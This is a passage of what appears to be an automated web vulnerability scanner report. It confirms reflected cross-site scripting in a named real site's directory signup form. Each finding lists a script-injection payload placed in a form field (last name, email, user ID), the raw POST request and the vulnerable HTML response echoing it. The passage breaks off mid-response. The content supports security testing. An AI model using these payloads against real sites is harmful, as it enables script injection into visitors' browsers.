with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST '"--></style></script><script>alert(0x002992)</script>
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002992)%3c%2fscript%3e&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:53:26 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=\'\"--></style></script><script>netsparker(0x002992)</script>></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST '"--></style></script><script>alert(0x002995)</script>
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 279
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002995)%3c%2fscript%3e&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:53:37 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=\'\"--></style></script><script>netsparker(0x002995)</script>></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST '"--></style></script><script>alert(0x002998)</script>
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002998)%3c%2fscript%3e&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:53:53 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=\'\"--></style></script><script>netsparker(0x002998)</script>></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION 